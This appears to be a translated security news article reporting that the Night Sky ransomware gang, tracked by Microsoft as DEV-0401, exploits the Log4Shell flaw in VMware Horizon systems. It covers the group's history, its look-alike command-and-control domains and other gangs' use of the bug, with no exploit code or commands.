The Night Sky ransomware gang has started exploiting critical vulnerability CVE-2021-44228 in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems.
The threat actor targets vulnerable machines exposed on the public web from domains masquerading as legitimate businesses, some of them in the tech and cybersecurity industries.
The attacks began in early January
Spotted at the end of December 2021 by security researcher MalwareHunterTeam, the Night Sky ransomware focuses on locking down corporate networks. He encrypted several victims, demanding a ransom of $ 800,000 from one of them.
Monday, Microsoft posted a warning about a new campaign by a China-based actor he follows as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed to the internet and deploy the Night Sky ransomware.
VMware Horizon is used for the virtualization of desktops and applications in the cloud, allowing users to access them remotely through a dedicated client or a web browser.
It is also a solution for administrators for better management, better security compliance and automation across the entire fleet of virtual systems.
VMware fixed Log4Shell in Horizon products and provided workarounds for customers who were unable to install the new version containing the fix (2111, 7.13.1, 7.10.3). However, some companies have yet to apply the fix.
The company adds that the group is known to have deployed other ransomware families in the past, such as LockFile, AtomSilo, and Rook.
Previous attacks by this actor have also exploited security issues in Internet-connected systems such as Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473 – ProxyShell). Night Sky is believed to be a continuation of the aforementioned ransomware operations.
Microsoft notes that Night Sky ransomware operators rely on command and control servers that masquerade as domains used by legitimate companies such as cybersecurity companies Sophos, Trend Micro, tech companies Nvidia, and Rogers Corporation. .
Attractive attack vector
Log4Shell is an attractive attack vector for hackers and cybercriminals because the open source Log4J component is present in a wide range of systems from dozens of vendors.
Exploiting the bug to achieve code execution without authentication requires minimal effort. A malicious actor can initiate a callback or request to a malicious server that passes only need to visit a site or search for a specific string to cause a server callback to a malicious location.
The security breach can be exploited remotely on vulnerable machines exposed on the public internet or from the local network, by a local adversary to move laterally to sensitive internal systems.
One of the first “high-level” ransomware gangs to integrate Log4Shell into their attacks is Conti, who expressed interest as a potential attack route on December 12, just three days after the first proof of concept exploit. (PoC). became public.
Another ransomware gang, a newcomer called Khonsari, began exploiting the exploit the day after PoC appeared on GitHub.
In the days following its disclosure, several threat actors began exploiting the Log4j bug. The first to take advantage were cryptocurrency miners, followed by hackers and state-backed ransomware gangs.
- Microsoft October 2021 Patch Tuesday fixes 4 zero-days, 71 flaws
- Microsoft September 2021 Patch Tuesday fixes 2 zero-days, 60 flaws
- Microsoft November 2021 Patch Tuesday fixes 6 zero-days, 55 flaws
- Conti ransomware uses Log4j bug to hack VMware vCenter servers
- How to Scan and Fix Log4j Vulnerability?